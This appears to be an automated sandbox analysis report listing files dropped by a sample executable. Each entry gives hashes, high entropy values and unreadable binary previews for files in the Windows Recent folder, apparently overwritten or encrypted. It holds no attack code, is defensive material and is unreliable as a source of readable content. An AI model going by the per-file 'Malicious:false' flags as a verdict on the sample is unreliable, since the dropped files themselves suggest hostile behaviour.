                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1358
                                                                                                                                      Entropy (8bit):7.86253269348577
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:u+6La3bb5rKxL30ECOoQX1yf8Px+f3gxNw14A5V1SLY2jfM9O4DoH67wJv0AcSMX:mOxr4QhOXFyfBfQxqKxjkHgY/D
                                                                                                                                      MD5:0EAB81D7D978E6D04DA5BC983BC0800F
                                                                                                                                      SHA1:9E6A80164CE4634A38805C13A8A5542200F4FBF6
                                                                                                                                      SHA-256:0F68CD96C6611438D8B2B1CCB087E91060E662F6335D0358505CB120CCAF4CC9
                                                                                                                                      SHA-512:0FA2BC5441E50EA325F8D21FD0DA04D266402EB1A5C552F92027E4DB805322BDCE776391C2A8E134E0C6E17915C4369DF82D58F6BB7A02DB672CBDBCEE29D5DB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlC~...,....C...hjE.ov.t.....^...=.]|..q0."..F...?v..j.b.>a<.T.-H{[.....pZ..0J..o.s.........s.x`...[E .U"..0q.....k]..@....'.W..4..3,...+.r........|.>f..9.%...0$=.*g.n.......k.I.!W..I.~...r..=:7.qq!e..I\.R;E...-w..@.p..?..u.qx..^..Q._ '....m..... .8.=k;$..T..x..2. ..^.R....@....d1./4.........F.....4K.~..R..).8J^...@..!.....Y!./m.s7.k..`...=..}.#.=S....B...W.6.Q6..../v;.I~.cv......}2..Rm.$...[.u.#. .r.'...Q|..T....P...zw....u.jM<|g.....F. ...A..........\...w...Qe7&.X.U....*..n0..p.i8.EK....p.h"..u...K!.[.r.k.c.%!%...f.!....w....D.h'*..X@......y.DZ..=Z.d.0..S..-~..c..#.lSDx. ]..9...Z.q:..0.....)...f...f.s......#/$...@=....aq.).8....Q.....u.Z#.~..%...N.& l.....}..K.d....a>......... ...._....'.%....9.U.h.~.1.t....M.....+...........>U...V77&3H......`a..s.h5H.=...H..H.z.6.Yy..H.@X@...i.x}.82..c.U.9.0U.:...z.6.....+q..!/#.1G........_I...i.kv........W.J.7.p...7....!....q.......w..r.s.....&..1.....7...._......eA.T.O&l..B....](..ka.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2430
                                                                                                                                      Entropy (8bit):7.9271618336542495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:0qrLVsHQXCeaxoRH7WYODdBN1AKzr3QIVue4st2xRRJ9nEA8xyg/z1D:0q2HQSxm7PODF1A8zv9xtGJ9n6kg/x
                                                                                                                                      MD5:41553A8723D2D519B34C77593C78ABA5
                                                                                                                                      SHA1:74ED26340C7B11602D1B701967725E9E7B0284CC
                                                                                                                                      SHA-256:E38E3E5D5B9637C937E6FBC7F204F5C9F3FCCD310EBA8D2C982C195F502F9346
                                                                                                                                      SHA-512:7B80DC009A5F12DFF579E9B13B84EBF045B265A86CC8C5EA681A3F8617DCB35D8DF7769CB21B6DFD15FA48E600E1281B512179434BBD32FCD213CB79C2784B66
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.{.i.L...@(Z.%F.o)oj...?.C6.c...h....I}..X.gA...[...]...0.D.V......dlt......A../Zc....?.....m.Or......g.;;..u.L..).H..WX......g.X.k....~.<8.l....a....45TJ|..&...........D.o~.l.Zf.<.,F...-...4cC........=...`-.$\...1*'...`8.h/<.FIGL...'...V'Tf.X..P!..Q[.T......}"....{...}I~..j.8{.+/..C#2.0S*..n.........!9.R."...r.x.3v.glk...a.]*5.*./.#....n.........9K.<h.f...&...6.T.:Z^V ...........v...$.z:..D..p........j.i..'....r......_9........Q..)1!&".&c}.'x.v.JY..Bk./t..{.pp..6....f..o<u......^..,a0R.!.........S......C...m.AM.RC.U.L....lr.........\Lg....P.e.X....S.`....@Av!=]`#...z+*.#..O....Qp...y....W.6.fE#c]f..[...1.....I...]..I.o....k{M....x.o.h.........-nZ..$....o..j9k......d.6...T..?F...|MQ{...Z+e.(.2../uc....x[t$.T..Q<.Q.;...).V.J.3....N...Fe.CB_";L6.M..G8`.b....r).9.8.&^c*.i.....kuD.......2 7.D.~H.fo..b.^...<4..#5..Q..m.d...Im....+..br.,........P.@O........P.O...;...sd'bh_&.+.M..0.@.~.=..;...<..U........Q.....<w..._.v.O.R.-.]+"?.>..~.L.fM

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CZQKSDDMWR.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.834402126488088
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:qXb/iZ7kVBnPWnrxZE4lsgjx2XP2Ppj/DwrN7idRU4Bajj8wwFZg2Fpia7lrpinm:qXb/iZUBnPkNZEtGk2BbDw8d5Fd6UiaT
                                                                                                                                      MD5:E9AE5D731657FF300E305C5A909D787A
                                                                                                                                      SHA1:4333D738D0A29B66C5857FA9A5D4C81E87BA8F71
                                                                                                                                      SHA-256:0137C66A020184F8FE5E8DEC5437DE344EC2428972030DD113025B4E5FFA4C51
                                                                                                                                      SHA-512:CAFB6DE1F2700A8AB6A2BA3D7F48F6A9F00B0E9BFF0A88AFD18EE16A4F82D8C6A67A0C9B041ED57E6916D0122653A7B2A94829E90D4146DC9CB757599A478A99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS..{]...w?AY..\...i.%..gcn&v.R.S......}..c..T.D...W..h.M....y...7.b.{..Q....Ed...g.Z?;..."..........<....Z..>^\.\..m..Wi".O5....S....~..K.2..X7O.J...je].[.o.....0Vt.edn.....u8z..._...!r......3.+.....q.8......,Z.G.]v...EBH.i..H.........T.!..i..Zz.V.g.... O.....N..4.[2(O.Z.#.....x.....iY.%DR._..3Sc...k.<..W.`..Og.*./ELe...&.5.6..p.&/B......d..m..b.(7K7,'h.| .d..,~..].Ut....4?Q.u......Y.>. .p...^%.E....V....}H........N.@...r.....cn..~...4.T...o.D.......U.Jr&z.Z.T.... ...f.:.7....)..C....)....Jn..L..)...m.*...j .......".~...-..t.*l....+.....U..0...N..\Y|.f.....V.S........b..D.A9m..{o.Q..Q...{]...A...M:.\..e.dM.s_.U\....z_a.+.l][CJ.j].p..... ....V|...w&Z.a..T.#E.ex.D..utn..Y.u......%P`?..&.B:K!.[..j`.c..D.../....A.Rq.1^;t;@..._.H[..R....(.]..C.9\r...j.x..L...S ...qm.......j........a..B.14...".R.xp$.P.x......w...b*4f]..K.ED...[...."n'..T..9LI.Oa@..%.....;Y%...N.e...x...,5m.....o......`.*U.kq.nl|..B..U&.....7..9m.mN...F.#...9'..D..2

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DBIQSSCSZX.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.845788218325389
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uS+uDF00hZJHlcqs5tlqYWyleq8pVVIVQC2AQXtD9rXYXyNndoNHbD:uStD/ZdW9kwd8pVVIv29b59A7D
                                                                                                                                      MD5:2CC5FB2AC80C5CF6DF668EA8394C53CE
                                                                                                                                      SHA1:2B0AFA16C00C21B53CFEB7039A66F7CA035429E4
                                                                                                                                      SHA-256:92DD1DE14208C4AC0658BD331D57E67D24E1AF1BD955F6D2BD11E060BC0EC74B
                                                                                                                                      SHA-512:050057C8D20D881C7480F70E4909469CE36FFEF1A4ADB0CD26453272A0F490CE77B304328F219C61BA9740A898D8ACD2DAAEEEDA1686858CF14362B410A5AFCD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:DBIQSk...Bh........\a!!}...z.....Ma...6......|f.(B...f...Z..t>.2.99.=.q [y...]k...j.....+e+.B...6..WE..W@.1m...'p.K.a,.~...Z.)..zB.V.$..k.......k. .x.G.......Wnh."D..H..$...F.g(TFi^.\.\a.V.E..@..S#.w..7....0.q.3.R......].X=?.X..7.a.kQ.D....$.........&.....]R.y..c.8.8...I?.1.v....g.Ys....F...O..8U...!E..]>.D....o:.U....~2..(...U..<.8.v....T.R......D'....K..Vkv._....PI.R.f...moX.o|.oi...2.W..U.Oh.:.`[*...{....9...W_..Fg.[.D.D.....&b.{2D|...rr..Qz-...<..V.Qu._.r..8Q..!.....9c.m+.hGX..'$.8~Ak].9......r(......`3.x[..&..M.. .....`.,7....0...).x.W....."......"W[...r.2c..!...<1....T....P...}.......... ....T.Y{....Tj.s.2}k4...M.=.4L4.H.....O_u.y.....v.0..+......_\R.C......),.Vu8....1..E.q..m..2.....|........J.s.....[...Y....z...*.(..#w......L....^G.:C..X.Y.S.n|..%.EE...X.D.K..Q.p#XE9........Dk.2.-...!U.+o.$...........k.....)..O/.w.>.m....'&I...B.....[....H.f...!.Ea.;.R..+..kG..,.....\PF...hM..L&K....S.'.|a.(X%..mh:..4.!Xi.fY..$...qy..,c....

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DRBXYKCKXO.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.868840557828832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4l7maQv9tymhOWkxDAOU48ycWZM3w5QS2Om6hhWhsiza8lbD:4liawtlOWk+Z48ycWZMA5Q70jCD
                                                                                                                                      MD5:3EAB6AFBD5EFC74E81C6A1DBFFE24E59
                                                                                                                                      SHA1:5AC6227B3ECCB31960543C362B875B065FB12AE6
                                                                                                                                      SHA-256:ED6DBACC6D66BD054859A01A1FC170C9ACB9F0C33019050FF112AF810FF1D8DC
                                                                                                                                      SHA-512:9D7DE2E76B6B38D212F9191CBED7085A7BCE2C5131A01E42EB36CD5260CD3B2951783C8A299933CF27171F907A2FC15A535487B36A8BEA5DF9B06B0A3877881D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:DRBXY(..)..d..M.IT.p.TK..-..g1........r9.T).z..~M....?.8'....H......[.Tp.1.}e.+....Hy....... .K..=....C.f.40.(......!................R......+.....u...]...V......`.A[[.\*...K.(P.....w.]).=.'.N..`....P......d|..Pl`.a..VF...%.~...9.........>....*..qK......GJ.Y...4.7.7.J..v....9n.h......N.L..qGk...j...".....|}..j...3.hh.uQS.......E........o....pB..(.........I.f.....^.w..4...... C...n.f\`D.:T..pB..(u8MV.{}.1...'.a...5.,QG.......n.ez.#s..*.\..9.C.......V/.qpA.g...P..'..fC........t..Z.Nn.ebG...3v .N/.......%...).ec..aK.2/.@'.E.......}..!&~.3.L.[l.5f..D.,..(NL.6i..5...$...V6H......%d....F..0...>...d...*$.....u.A.Y....0f.........$.no|.e.zr.j.i...7.^.K.....q*.......T.<..|..]..=..m..W.....m.f;...S1...[.8.q......u..|5;`.....s..b.JCx{.h.g.......t.@....N..... ..1..../....f|.....RR.&b....y..Q/...QKq...=r.....q&..g..!.GC..a.{<.&.,..&..Q...6#...@.....+..w....:......28.......F.s\=u.24W....$.....N.'p....C.!......c.....t....,.e..P..C......E.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.865931454853426
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:NoLvKp4HYdv5qSCaHlp7uF1Xy4nvWtioSg/CQjhApE9C/bD:No6SYdv9P7R4utLtApWCjD
                                                                                                                                      MD5:025BA5EEEFCA69553317695EB0613BA1
                                                                                                                                      SHA1:D233846E505C2E1578C95F5C4C72CF0168883B87
                                                                                                                                      SHA-256:A35B04792654ED5D63C95FFFAAB86BE526754E979A85BC65D22FDE598E5D576C
                                                                                                                                      SHA-512:C713ECC174D1915F3DF5BF2F8949ACD838AD877397ACAE391496B8AC268423E0F3BB1AD14D8E4EDBAA56A028331568D281BCFEB6D98B3B2D0EA50533221A78E2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD?...T:6..'..O/7l~..NG-..K(...w..*..kWZ.,'.P...V.9..Z=t.....`.m.`v..........[......`.v2@...I......>...x.H......(N..UPy.|NZM3.w^.o..9..-ss...0u.p}.d..9+.p.;S.v[..$2..)..K.W.n.4..kg.t.~T..$!.J....}..?Vo....|.....>*.>.te....(..U.._w..^Q.1.|.q..zh..de..........p<..T5q....'...Pf.t...uB..#...^....L.K..+.X8J7......R.9*..oF..\}.]}[KO..#.....<....`.G..7.C....~.DB.5...'....y..Uj.{\s..w.#.......h....<.Ni..-.x.,.I.\...(Tr..#.$...nM......&....V.....XE.*x.<.x.[[-....#.\.D..R....2.=..4....._%k..{....Mx.|..v......".<.....~..3..D....q/..)CJ].;.W}../v....&D....!=.[..Q.QPF.7.@.._...5.......vj........k.;......*..e..W+l......r..N..*4.Pn........'....R.%.T.a..D0qL...jD.x..W>?NV.j...G^K.W.......}...D...~.{*9+Y..%.r>L..-..e.~O..8..mj.~...0..<.......wu..L.....8.9.b1t.wY...::$(aL........9.......]:r.}Q ...B.,...R.Q.=.J.T ..O. ...y+.6....H.!#....u&U.b......l)..[.b.Om......2......\..M.L.5...C.{!...k...$..&....OI...;l6.AIY...XB...v_.V;.p&....%.SKbd....I..Xy*.S.7.>1

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.835342032410528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:edMLGTSFLAVZnZl6/vm+MXdvAyhmTaQlpOWKz792/8jbD:edMCOArnUTMWqUcWw7d3D
                                                                                                                                      MD5:B20B9984C712FE59438A5935060C5FA6
                                                                                                                                      SHA1:F4B422AA8B66963BDCD9A7185CC5DF9AF51095D4
                                                                                                                                      SHA-256:461120722A199BFF54013A8C7B875BD138DC8B0E60158A724353D10966DB71DF
                                                                                                                                      SHA-512:E95CF2891D5AA940BDE4BD964C624F39F760AA8017B0CDBD41C12EADFC903A011BBAC94DC87FBF5B3B967FDF2D4D1F59900F4EFAF9814238A0177E2F7CFF9A45
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.q.<.RP..N.Y.... ......".....zz.V..q".O...$...(U...)..U{.`fJK...$.r...*.O.f..o..t....xh.Lu.s..t.m...<APn..}m..0..36.....7.nWQ,...._B..[.H...u.C!e_._..~M...B.%..,....V.zxVk..NO,....q~.l.D2n.=.(..5.(..%a.....S_.).....n-@.i.w.b?(G.X8..I....v@.%.;...`....F.Spq$A1n...//1..|E.t.\.../..d.]..g....o..g..>.8...|u)..Xn.....c..? %0#QmH..1...*7X`./.$.*..... &.Q.D...7...q.u(.....2f.q .vT....ci........`....z}...@...u6..|..f...X.Ik..%.W....1..\U(....m_7".c...u.G.C.OF.......=."t..W5(..r...S.....qj....h.,...(H..v...O... ..N.K.5..C....!../i.9Z...F.U...kd.G&..Z3..92:...Y....._}<....U.._....&8....<W...*#.m{(.f(y..O6.}?S...l.W.f....c...J.0.H....~..G.f..9...u9:.....Yy."=... .......Cs..,.....Jd....q...Z0..V....f .F....S.{.w.[..z...U...].....R..._.5eLP*J.4.z.%.....,...+...X..OKF...W..`.oX..Cx.._Z....O.W.,k..;........=e&.....>9.E.+.e~C.]...+...:.2@....Cfw..V.T..s..-..do$.w..9;d.$.l<HR^........q..gP=.=3.;...`!.{}.?2...^j.b:.0...f*T..)v...Ks....' Y..q.p6.(.~b./(..

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GYPUZXUUOF.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.843798005558956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uR98Xl5sTSV3R3xA7Qn2DsfQ3WL4nxsDdGtftbeK91/KEGiYI7fAcUnQHbGL/TPX:uR9kdasfiWu6GHyYNK7i90cUnSCfD
                                                                                                                                      MD5:B2FC646CEEFEA0048602105D0264EA32
                                                                                                                                      SHA1:96208F13D8E0F945CCF95E2D17E2E643597434C6
                                                                                                                                      SHA-256:874DA876F5F05F16892CB38F8A09B8405D880836E73AD1890FFEFE74352F382F
                                                                                                                                      SHA-512:0611F14D01FAD7FBB6786C051DCE71F2D5A2EC4C9469F520349B9036977C3931F143FA4631FC023B7C8F74CB8FDF987F315E56CD0224924FD38D047C21DD7137
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GYPUZ(...4v.W..o..Vc..4J..X.7....{.:.>J.2..".>..g['...l....7..=...]..#.'...U.1..`..H..:#7......ZZ...44..}..i"....e........:...sY..."N)..O?...K.Ss.....Y........F.95..Q[xb..m....KPQ........xN.s.1.(....8J.......^..&....V.....s.......,._.}."H5..`....*..A.....q+:P..;..v{..Uj......rk..H....}..f...:..6).z..<..O....>.U..D/.=$.i%./...?..p....(u5.e...".aV..Y5.}Y..6.......o.A}....s....].e.n..4....).8|r...CA...".....R..#.>...*MT_/....Z.:.Tw.(Gd....h".I2..yR(..=...A..."...h.#...z..w...8F...K'.<.[...r%m.n bN......P..........k..I.Xs.k.o...;..sEo..8l..d...G.a.AF}.{FhE...M.&!Wj..^N3.Kys..B...y~k......!.&..X.^...W.<P6.&y..9....N....q=.g1.P.O.....%..&.t....;.....k.............LqZ.'a...W.>....A.....K.....aN..{..HH.Y.r.!."J..7$../.....v....t.!h.. U7.....PL.!_..B...7W._>...L}.W.P..]......v!*..".J..t8T..2?...T...S.c/.8...dD..;M'...c.in?1..`I..v.k.1......`..k..N....q......d..Y.sc^o.p.*....Okd.....c.WwF.u..`.#-..(.D;b.`.M.[............S..R.V.oWL.x..v.O.h

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.833689838807588
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:hq/37TUB4U54sbqFQaKrQAM3jzjsgdDF7KBuS4IMejaqihWt1MbD:ho3cBR57bklKvoogdZ7KBuS4IBihWt1e
                                                                                                                                      MD5:DB1F68E6666F48285E359B3CBA410958
                                                                                                                                      SHA1:752B4B15346FB7F59AA0008DC23746AFE8148233
                                                                                                                                      SHA-256:29475B4C2425DDA3DEEAD8C4B7C6623996749D285B7D0AEA743B30F7830152D0
                                                                                                                                      SHA-512:0BE987B189B205EE21435B26083B15A35226DF96281AB7FE69F8B2412AD73A4BCB4721FA6D38968485C1DAA5BDA7C86BEDB99EDD350889CBD375B81939A7BB26
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPSre......L.........1....pz..o4....x..dOP:..p.v...oe.....h......|.^mT...i....h..S..w....'...+P...a...H.e.{p.K.t.=v;..J.m..O.l...FH..}...V.*....+3.N<w..MH.0...X.6\..|...R".<.m.$.B.X..p.V1...4...k.+FaK^....Uo.....:FG..~..k{..8......_.ph..uQ...u...w....JK...}..zT|Q...02.(....*..[...$...T(......W....u.vN....(.....T.._0..x.Y(8b...eO...i.u.rZ...\c..8.R.}d.........&W8S.|...C.y.[..W.K....X.........:q..Q$..*.k...o.<F............M.i..,.=.-P.1-........a..Jv4.p....l.i.Oe.p.|.\...T;.8..'*.+..u..v....~.q..<.......v}.V2.0B..s9.....m0m.....j.G.....3.......>.jm_...?...9..vI..h.3%..J..B.-Y.BBj.....Oa.N>.....d...t...+`.......4.......L*.(.~D.z'1....W..U.MH."8.F8...2F..H.....8[.+....j.D...s.m...d...1.H...e......@&...o..TO]jk..."....N..}.....tP........4..N..W*....}..A.q.?...w9..1.....h.....m9#....RxU.^...]n.y!.I..haM....A.kP.})...:.o....se........I.r...X...<..L.c0..}..'.5...%..Z&f.N.m.n.p`.@..P.I+kT4`}..M..mY^..$....3z.J@f|.[y....H...,@..E$..T...nEkH

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HYGZTMOBZN.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.864025517831445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FjfUIhKp/ARjexughpZ9sLiAIVVuyL4LSXlc6S4rCznm5cnCF/FXJBf7bD:qIhfjexXhpAmAGVZLgSXldLlFxPnD
                                                                                                                                      MD5:99BD7789045F653AD1DBFF91730FFC56
                                                                                                                                      SHA1:B4CE6BF35CF647008E082BF33C5663132AA569DD
                                                                                                                                      SHA-256:093B4554861EB3E5DEED8D2B30316A1A5561AB45D29BD0B3C3F5316B8F9961D9
                                                                                                                                      SHA-512:884EC09E4329E1F4CBA25032B4F06ABA1CF4C4CC269EF7B977DC412A65B0037190E4F1B8458CE09F0F2547990040601E04276670263D9687C012D34BCC7169F5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HYGZT....5..c.q..)........00.[S....{}q...r=......Vte..Lz..ATo....8.%.@...e...H............8.....>...b&h....[q.s.V..E....b.v...D.j'd.31.......or...@5_..F\1...'....t.7S2.!2..~rH..i...+D:u..q..k5.,..fzf.....R_...T.,............V..."...*.\........s.0..?...;O..#Kj@._..W9....=..=Y..3..x07.....!.X.t...mc.t..f.x...\[..h...~. ......%j....L.-S....g.Ezs&\..y...v.....=;...=....}>.F..Lt....]$....Az...........q....a...."....W..(.O...z3./a.t.|.(PWx*....4W.`L..^:...=..G.R..g..s..q5.W...4....P).V...u.k...........)..)...".j...Y.....+.8..H.GYT=):.....7.j0.]KF.!_G./...j.&..@N..;....h...7(H>`..[C.n..R.-.|.. "....U...M.e.k... .....[.....:.i.3f.......Z.9..p....)Jk. ..(%i.p........Z.b.....o.x..K..wU.z....Q.L.....\Q.[.S.....N;&.vD.':..I.8.....`.EmY.ng."..kCyj.2...V........l{Lo....38.i.uk.x......$:....f.x0...T. .a..a.Wl...q6.-.3Mm..X.Od.....\.z........TG.M.b.X].@...v..m-.Ku.-....qA.5.jR.. .5...=..O.l....c~w......ml5nn.8OE..u...)..B.`A;.ms..2..=....{.4...

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HYGZTMOBZN.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.877218910519629
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ArkBQ2FL2sEAPU/nFp2fQDuLZRHAaN1Pu4WU2fMxzsrJN/4OInKbD:Ar2BFCqUt6QIvJTu4hmUOIoD
                                                                                                                                      MD5:8D04F379D1DFADF5625F1818882A0F55
                                                                                                                                      SHA1:F5A981BC8CF5855F6E8D5A1F8361A6AA400FFE25
                                                                                                                                      SHA-256:06988B7832EE983DE0F6E0225DE7AD1344D8168159865857E2A6D554DFC1A9E0
                                                                                                                                      SHA-512:28912EB55FB8AA5C4698742ADACB00AA7083D7B3830FB7A162E7B11D7084C9BB6FDC41EE05C854D919809091C580E91733ADF0F2961D3211499B3B79E0CAFC53
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HYGZT{3.>..f.,v.tw.....9...Xh}... .j%_.'..v....K.]..l.<.j.....P....v.\.......kR...i.@..os.(.(@..'<6.h..s..../..G...\e4M.V........m.....B.Z.1.ACXGy+...E...c._.p;.K...I..y.. ..qm.....C.."..W.IjU.y....g*..c.....>4p..R>....V....k%........%.'P.Q.n..CBP).... .r^.{d....oM...`|.4'....<..".5...T.O<....@U.Z/!..b)...D..d.E.v)...kw......#U`=..\...S.,...J].#.....P..M...*H..+.S.fE."t..".x.9....4.~.n>.o.=.h.lS..=...T/|...o"m...aD.......3W...".._V p..M..6*..@.<.c|.......m.Q.Q......f...i7<.R..*......dG.K.t`.b..j.Q... ....k......6a.A.I.....yH..s.Q,Q........T.....g.g.a.........,........*S..J.....B.1B.g....Y..T;..F%.Gz._h....~r.~..KC_3..%n;/..<.B..:.T..zVX...L.q..j.....&.Z.K0.h|...b ...i0.-@]......4..K...,.....2..oa...'.P.a.........>.k..'.B.gO.B.X.<... #.E.........?2>...=..h...X...}D......T..l"F]...N.L.\...y..t.+....i..U.....H..........*...j...|'B.4p."....U...........J.%{5..z{.&.p.&...s..g..lG3^.?..EW......!..9.j..(S...o...Lce./DD.c.;..Z..P.-.g.....P...."..#

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KGUOGFAKSS.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8494043201751404
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rGkQ6AlG0KOdkie/gwUt1gWwdG1A5wFOMxsUA1YEcRzUqkyviUJ7pbD:rHQ6oGfOdkmwUt/gfxYLD
                                                                                                                                      MD5:14B4574E2AAC05F720D5036138B24367
                                                                                                                                      SHA1:EBEE1617103E516BB034D8F0CD51F81C3676BD11
                                                                                                                                      SHA-256:7A53F130D83DD8A613C81DD17AB6DD22E4A4DF08D54C1EF7B7DAE9C7C3871DE1
                                                                                                                                      SHA-512:8C62F35C2B49A52F6F276EC2BA8A501FCA018BE109CEB433DC2BA85A8F69C6751DEE7E0964A811DDD68EDCB32FDB99C0172B6A7C43DB04C040A1A99D38254247
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:KGUOGA..^'.;e.'c.ey.i..5.c@..|.*x.Y.o.6...P..V.;........Q....(...F..".>..rl..O.q..?.CoB".5..../......?.z.j..t..P..<.c|].2..k...J.,..f..j.....K..1..|?.i.g!&..(...+..V...>].@Q...2..a..fK..f........3c). .S.NJ.i.<`.h..........H.....NIl.uR.4h..a.4..fLa..(zr.#.%..n.M...o.9...l..8...9...+.....3.ou...B._L..M.b....bF.]x[..x.f.N....o...4L...,.d.......{.....]~...t.@q.L.eH..P'..<.r....Ot1...k.K.Y...O...h.i-.E..F......hB.....K....1s.j<......B..+.Q.........4......t....v.S.2....y..C..]..{M]w/.........!...!L..t.u\.K...v"y.r:L....Joz......k...@..%oGz.(......ex...s..X?z.._...t..dm.....[W.'....r..x..r....mW.. c..)r0......0...m.sT..kw.%..f51."...O...<..N..#...Us.x..B.o.9.d.]....|-@.).+3i.m.Bu}..U..;.6.xm..P...P...uz......xz+.I..f:..-?........m2.J....mN.#....;w...|.0.j&.].Ncy..#-.......... ../[........B.....#_@..U.U.{i.g.yx.v.....~@.g.c...M....ZP..o.^.b...T6.2;..tC...#.........O.e.....N...C........b...T.....G.......r0..WR...A....".3....D....[..o.QF.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.845356392034434
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:jcas4zFDQfdHIvjv2HkWyq5BuM/n9i1j4L/KbyZXSsylpva6syh5/bD:Qas4p0f9IbLJq5x9ihAK2XnKqQ5jD
                                                                                                                                      MD5:E62161E7F28E046890A6177DDE72FB8A
                                                                                                                                      SHA1:016237D79C7EAE1BE89720E2B7FF1BFAE01BDF3B
                                                                                                                                      SHA-256:C1DCC675DEC5D697E1EC9943008E2EECAE3B260F928D6FAA197197A0A0D42574
                                                                                                                                      SHA-512:1F4E9F54DEEE60FD4FB43C269431D142BFFE6009BB5EDA90158C397F14E51F144203E2F8EC01A9C799D2AD0AF5D31070928FFC6109D261E7F2BD7AFC5CF4A136
                                                                                                                                      Malicious:false
